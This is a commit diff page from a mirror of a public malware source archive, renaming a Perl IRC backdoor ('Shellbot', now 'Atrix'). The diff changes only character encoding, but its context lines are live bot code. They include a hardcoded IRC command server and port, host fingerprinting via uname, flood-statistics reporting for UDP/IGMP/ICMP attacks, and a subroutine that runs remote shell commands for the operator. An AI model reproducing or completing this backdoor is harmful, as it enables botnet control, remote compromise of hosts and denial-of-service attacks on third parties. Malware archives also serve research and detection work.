mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 09:26:09 +00:00
Rename Backdoor.Perl.Shellbot.a to Backdoor.Perl.Atrix.a
This commit is contained in:
parent
486cb664b8
commit
d372ccc7e1
@ -27,7 +27,7 @@ my $ircname = "rox"; # User ID
|
||||
chop (my $realname = `uname -a`); # Full Name #
|
||||
#----------------------------------------------################################################
|
||||
$servidor="irc.gigachat.net" unless $servidor; # Servidor de irc que vai ser usado #
|
||||
# caso não seja especificado no argumento #
|
||||
# caso não seja especificado no argumento #
|
||||
#----------------------------------------------################################################
|
||||
my $porta="6667"; # Porta do servidor de irc #
|
||||
################ ACESSO A SHELL ###############################################################
|
||||
@ -231,7 +231,7 @@ sub bfunc {
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
|
||||
|
||||
|
||||
}
|
||||
@ -286,7 +286,7 @@ sub shell {
|
||||
my $printl=$_[0];
|
||||
my $comando=$_[1];
|
||||
if ($comando =~ /cd (.*)/) {
|
||||
chdir("$1") || msg("$printl", "Diertório inexistente!");
|
||||
chdir("$1") || msg("$printl", "Diertório inexistente!");
|
||||
return;
|
||||
}
|
||||
elsif ($pid = fork) {
|
Loading…
Reference in New Issue
Block a user